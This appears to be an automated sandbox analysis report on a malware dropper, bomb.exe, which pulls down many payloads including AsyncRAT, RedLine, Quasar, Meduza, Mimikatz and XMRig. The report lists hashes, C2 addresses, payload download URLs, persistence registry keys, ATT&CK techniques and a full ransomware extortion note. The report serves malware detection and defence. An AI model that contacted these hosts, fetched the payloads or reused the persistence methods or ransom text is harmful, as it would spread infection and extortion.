asyncrat | 94936fb4c7bed2e7233fade7980425b0300451d76a7ac9329c604886e2a9a013

Resubmissions

22-02-2025 17:20

250222-vwwqmavlhl 10

22-02-2025 16:34

250222-t3a7tstphq 10

Analysis

max time kernel
50s
max time network
538s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
22-02-2025 16:34

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

bomb.exe
Size

12KB
MD5

a14e63d27e1ac1df185fa062103aa9aa
SHA1

2b64c35e4eff4a43ab6928979b6093b95f9fd714
SHA256

dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453
SHA512

10418efcce2970dcdbef1950464c4001753fccb436f4e8ba5f08f0d4d5c9b4a22a48f2803e59421b720393d84cfabd338497c0bc77cdd4548990930b9c350082
SSDEEP

192:brl2reIazGejA7HhdSbw/z1ULU87glpK/b26J4S1Xu85:b52r+xjALhMWULU870gJJ

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\Decryptfiles.txt

Ransom Note

ATTENTION! Don't worry, you can return your files! All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and your key. Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours. Contact us email: [email protected] [email protected] ID :AB48A3C9E5CEBF397B7E4AFDA63093538BA3511184BB5163DBD11FCD0B5F557A3849968C5A153C157998E8A4E56675C6E31AB9BE295EE1770E90E33BAB606E3AF3EC3A0AFF5D08BD50724129129814FFCCA870640C73D92D0D83D5497EBCD84C0A32E200FE5D4A97CE00D146A19F8255A9F0D02C82234D31A1C21B5BA53EA2B7FE3F8A6D6D35A473EC97679BEA95D4FA99A9FDE8044F2371CE32F2BAB9FB8CE3FE5B3DF4BBCB9549B665B4C4C3123178FE9E1E5AFB09E64F2BF3A6463479FAB4259BDF45F110818D791CE4B85BB4FC2AA0ACEDF8CFF44711B8359F6CE500868CC0F00D1BEE15906E3C3CE64479AA93F6AFD1EA2905C3810B485676D49952709273B249BBA3E6C0D893B349C07E51CDC4D6A8CDA18D0F2747E82F31EA108B177700B520A34737C21217BF54625E76E056C0D222792C32E4737827BAA2DAB192A095A9BF24D0F8123CF86DAFA7CDD4C863B2E2DAB153CCC36A7E52D04407E547A16FE1DF88DD421598DA5889C359084E42CF050428336AEF0DB6CDEB3881DAE1A9F0A115D627719743BE2A9F456E3579DA8200D158EED4D3C88756A9E2F2047180607D8F51D73F24EE84A498318E5638941A7963661122D3564AD23A3D523DFDC07E2F84E1301090C706C8B959EC5A0B25AD3B3D71DC8223CE2687E851193AE56693B791B2F94A4C0EB8C24842DEC1FCE8CD8AF377AF7360CE7CE09A562DF5CCDE3AF78C59AFAE46F031477F0ACFA83AAF50475833B67982F75C4324468E5292AE35A488F4AE530F41AF790F913825F7766D73FE7BF63584CFDEAC75DCF417096B986D2C5FD85DB58A69CCCD102553ADBC6370B5048F45A2310DB063F2E792E726937FF85610D80A9590846301F98CE6DE9F0E88922D38FCDF1EA1B53E4A6269A28800CD45C33608A07D40FEB7EF6603E0F6EF934C90AA16CE0F31F5123E6FCFF15D225B4ED0396DA6397725FD3B16E4DF28677A83F6AE4EC3B465C583F3B89033EF7A53429FB76B5CBA2438DC667B16F0F156A6DC6437DACF1B87D04BFFF2D508C071AE54A4F5E557D6903F2C5F6F6EBB2729B55C7D9C2A6AD28649AB748621DEAF77DAAF395DC563A4BB5D77F3400EAF0AA37E9F91F3DED0ED78235C80B81A8D1A6FBBB86017576F1C8966138F82F5B02975F4379352B66B43407F281D273522AE8671CEE9A5F5A6671084582F6FF4115C2B0CEFCFDDAE1F1EB4E5182BE6108133DC509742E27D22830C62229A49A8779359BC3BE3FAED720E7421C2DC400FA2348C52F6376322B64467EBE8E89C5BC841A31540AC5165CACBFC1CC728F6CF3BD12811C2E8EFA9BB795856FF5BCE3809FC78025545C6C7379C74C9BE56ECE4CCFA3FEAA75DD2B800A140C70887BAD4FBF2BEC8FD09BA88B4A3CBB8F2CD5726DC9D680C9ACC383CE775455C0010048BEBA24FD75353AD75E63A940C405FD48DF3D3DFAFB40401DAE26F70B12AA579B55E0C1BFCA603B14571DE4596A920FDA7178263FF9A0D75B564FFAD0311A2AF58BA64021344871318461A92AB93E8024F863E8157478452CC14F398999EC849CB0AA746137AD295102D6019A3072C878C34D1BEFD464E7C41CB2BF58BDE8FB9BA038A4C6BE7857992F4F39D5F9F21181DEA2F0872C0A74B58898638F952D730DBF7A43EA949CF1D422BED4BE2A73B4B17C18577D34C59641F3D7659CE0D6BEF6F5DACB321B25481623D9EE2B179D9E628B481AA3ED45DBAE72880BC9E75AC008AD0219D284948C6DDBC60616AE955F85006C216071CB1126D0920ABFFDF96A05B75EBF448C1E3A039F5A6E8390E88DBA2ADF5BD097B8122CC82C6FDEF903649146A97453388EBC43DCC90CA69A8B893A1971A6E03314DA5EDFB2CAD95887D0D714B0A5C955B91F52B67461D2ACAE3E5C0EBEB1641CCB3FE4EB52489FDE12B967A2F408AB9D467BDAF755E608D71CDCA09D13481E7431DEE3ADFBAEFD3705AB04BC5C8CFBAF452F0D3582E8A6BF2E1AAF350BA73383A6E53E7434F112311D88C4803DD1E592F76B7CC847EEC5F2FBC5E8C2F30D0BCD19B0D68AB7D969C01F262C48FB2310AE57DF321342E5AD6AC5ECBA8D03CA8E151BEFEB10AC579D2A2130A31AF4FF7537D393D7A7BF64AEB0367BCEEA7F8F29F763351324E861B3D631CD7E486B91949BB0CADAAB30BAF2F065C106CB3B347A245FEE6943B75157698CC69D69B0645F897751654BD76A617CBC0CAB3071F8E4E84A35663913509F486DCC379BFAF0051F0DCF8DAE5008514567D0BC6728659DFEBF5141A3EC8793CFE08D9535C8D518E3B5ADD3B3D6235F13D066D61954CF0D64D9BA025DD78B479F3EE2B1833A06C22ABD5AD5B7C4258697A66535A5CF8B5976C9798684F554028

Emails

[email protected]

Extracted

Family

redline

Botnet

Feb2025

176.65.144.135:65012

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

162.230.48.189:9050

Mutex

e1371af2-3c26-486c-a950-9db9a0954e65

Attributes

encryption_key
B29AF710516F59F4E03DA48D133686BA3D427275
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Startup
subdirectory
SubDir

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Meduza
Meduza is a crypto wallet and info stealer written in C++.
stealer meduza

Meduza Stealer payload 5 IoCs

resource	yara_rule
behavioral2/files/0x000a000000023e71-9217.dat	family_meduza
behavioral2/files/0x000a000000023e74-9259.dat	family_meduza
behavioral2/files/0x0009000000023e8a-9303.dat	family_meduza
behavioral2/files/0x0008000000023e8b-9339.dat	family_meduza
behavioral2/files/0x0007000000023e93-9450.dat	family_meduza

Meduza family
meduza
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral2/files/0x000900000001e6db-32.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/7876-5060-0x0000000000810000-0x0000000000B34000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023ce0-626.dat	family_redline
behavioral2/memory/1604-2840-0x0000000000E00000-0x0000000000E1E000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023ce0-626.dat	family_sectoprat
behavioral2/memory/1604-2840-0x0000000000E00000-0x0000000000E1E000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023cd0-411.dat	family_stormkitty
behavioral2/memory/5776-496-0x00000174232B0000-0x00000174235B4000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

XMRig Miner payload 18 IoCs

miner

resource	yara_rule
behavioral2/memory/1800-151-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1800-152-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1800-155-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1800-156-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1800-157-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1800-158-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1800-159-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1800-193-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/files/0x0008000000023c76-295.dat	family_xmrig
behavioral2/files/0x0008000000023c76-295.dat	xmrig
behavioral2/memory/5692-307-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5692-305-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5692-304-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5692-303-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5692-306-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5972-404-0x00007FF60B220000-0x00007FF60BE54000-memory.dmp	xmrig
behavioral2/files/0x0007000000023e31-7929.dat	family_xmrig
behavioral2/files/0x0007000000023e31-7929.dat	xmrig

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x0008000000023cd0-411.dat	family_asyncrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023c41-214.dat	mimikatz

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3056	powershell.exe
8588	powershell.exe
888	powershell.exe
8796	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 23 IoCs

flow	pid	Process
22	4940	bomb.exe
23	4940	bomb.exe
19	4940	bomb.exe
21	4940	bomb.exe
15	4940	bomb.exe
15	4940	bomb.exe
53	4940	bomb.exe
17	4940	bomb.exe
17	4940	bomb.exe
41	4940	bomb.exe
62	4940	bomb.exe
28	1696	http185.215.113.66pei.exe.exe
48	4940	bomb.exe
48	4940	bomb.exe
48	4940	bomb.exe
56	4940	bomb.exe
67	4940	bomb.exe
18	4940	bomb.exe
18	4940	bomb.exe
18	4940	bomb.exe
18	4940	bomb.exe
18	4940	bomb.exe
43	4940	bomb.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
1848	cmd.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1196	netsh.exe
4872	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 2 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
724	msedge.exe
7464	chrome.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	bomb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	http185.215.113.66minedelll.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	http185.215.113.66del1.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	http185.215.113.66mindelnew.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	http185.215.113.66del2.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	http185.215.113.66klmnr.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5f1c1f4a8f4a8082788e31e499b05f88.exe	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5f1c1f4a8f4a8082788e31e499b05f88.exe	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	WindowsServices.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	WindowsServices.exe

Executes dropped EXE 35 IoCs

pid	Process
3624	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
1696	http185.215.113.66pei.exe.exe
1920	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
3648	httptwizt.netnewtpp.exe.exe
808	http185.215.113.75filesLisan7random.exe.exe
2056	148956848.exe
4420	sysnldcvmr.exe
908	http185.215.113.66xmin.exe.exe
2464	http185.215.113.66mindelnew.exe.exe
372	sysnldcvmr.exe
2580	http185.215.113.66del3.exe.exe
4780	http185.215.113.66minedelll.exe.exe
4404	WindowsServices.exe
3500	http185.215.113.66del1.exe.exe
4428	svchost.exe
3348	winuspdt.exe
5008	http185.215.113.66del2.exe.exe
968	http185.215.113.66xmrminer.exe.exe
4972	httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe
3124	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
1020	httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe
5244	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
5364	httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe
5544	wincsupdt.exe
5640	http185.215.113.66klmnr.exe.exe
5972	httpsgithub.comLean789ruehtrawrefsheadsmainxmrig.exe.exe
428	http185.215.113.75filesz1nk0vrandom.exe.exe
1092	http162.230.48.189uploadsA.exe.exe
5776	http196.251.92.64reshClient.exe.exe
4976	http162.230.48.189uploadsDL.exe.exe
2408	http162.230.48.189uploadsB.exe.exe
1604	http196.251.92.64reshbuild.exe.exe
6224	http196.251.92.64reshDevil2.exe.exe
6256	http196.251.92.64cryptBREMCOS.exe.exe
7224	http162.230.48.189uploadsWinZip.exe.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe"	148956848.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5f1c1f4a8f4a8082788e31e499b05f88 = "\"C:\\Windows\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GUTDSRESW = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe\""	httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Windows\\WindowsServices.exe\" .."	WindowsServices.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	httptwizt.netnewtpp.exe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	WindowsServices.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\5f1c1f4a8f4a8082788e31e499b05f88 = "\"C:\\Windows\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Windows\\WindowsServices.exe\" .."	WindowsServices.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe\""	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\G5UTDSRESW = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe\""	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe

Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
3784	cmd.exe
5568	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 26 IoCs

Web Service

T1102

flow	ioc
63	bitbucket.org
332	pastebin.com
342	discord.com
407	discord.com
621	bitbucket.org
18	raw.githubusercontent.com
266	raw.githubusercontent.com
315	pastebin.com
317	pastebin.com
330	pastebin.com
346	discord.com
348	raw.githubusercontent.com
313	bitbucket.org
321	pastebin.com
329	pastebin.com
411	discord.com
622	bitbucket.org
878	bitbucket.org
59	bitbucket.org
265	raw.githubusercontent.com
314	bitbucket.org
351	raw.githubusercontent.com
388	discord.com
879	bitbucket.org
13	raw.githubusercontent.com
17	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
870	api.ipify.org
881	api.ipify.org

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
7024	powercfg.exe
8368	cmd.exe
1812	powercfg.exe
5496	powercfg.exe

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	D:\autorun.inf	svchost.exe
File created	F:\autorun.inf	svchost.exe
File opened for modification	F:\autorun.inf	svchost.exe
File created	C:\autorun.inf	svchost.exe
File opened for modification	C:\autorun.inf	svchost.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
6264	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
7328	cmd.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3348 set thread context of 2268	3348	winuspdt.exe	137
PID 3348 set thread context of 1800	3348	winuspdt.exe	138
PID 5544 set thread context of 5588	5544	wincsupdt.exe	176
PID 5544 set thread context of 5692	5544	wincsupdt.exe	178

UPX packed file 24 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1800-149-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-148-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-151-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-152-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-155-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-156-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-157-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-158-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-159-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-150-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-147-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-146-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1800-193-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5692-307-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5692-305-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5692-304-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5692-303-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5692-306-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/8692-7880-0x00007FFC767C0000-0x00007FFC76DA8000-memory.dmp	upx
behavioral2/memory/8692-7884-0x00007FFC98720000-0x00007FFC9872D000-memory.dmp	upx
behavioral2/memory/8692-7883-0x00007FFC98730000-0x00007FFC98749000-memory.dmp	upx
behavioral2/memory/8692-7882-0x00007FFC98750000-0x00007FFC9875F000-memory.dmp	upx
behavioral2/memory/8692-7881-0x00007FFC98760000-0x00007FFC98784000-memory.dmp	upx
behavioral2/files/0x0008000000023e69-8857.dat	upx

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\sysnldcvmr.exe	httptwizt.netnewtpp.exe.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	httptwizt.netnewtpp.exe.exe
File created	C:\Windows\sysnldcvmr.exe	148956848.exe
File created	C:\Windows\svchost.exe	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
File opened for modification	C:\Windows\svchost.exe	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
File created	C:\Windows\WindowsServices.exe	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
File opened for modification	C:\Windows\WindowsServices.exe	WindowsServices.exe
File opened for modification	C:\Windows\svchost.exe	svchost.exe

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6068	sc.exe
3432	sc.exe
4972	sc.exe
3320	sc.exe
1864	sc.exe
5296	sc.exe
3884	sc.exe
1220	sc.exe
4956	sc.exe
740	sc.exe
5280	sc.exe

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0008000000023ce4-2197.dat	pyinstaller
behavioral2/files/0x000400000001da83-6549.dat	pyinstaller
behavioral2/files/0x000300000001e57c-7704.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4672	808	WerFault.exe	91

System Location Discovery: System Language Discovery 1 TTPs 46 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http162.230.48.189uploadsA.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http162.230.48.189uploadsB.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.75filesLisan7random.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.66mindelnew.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http162.230.48.189uploadsWinZip.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.75filesz1nk0vrandom.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http162.230.48.189uploadsDL.exe.exe
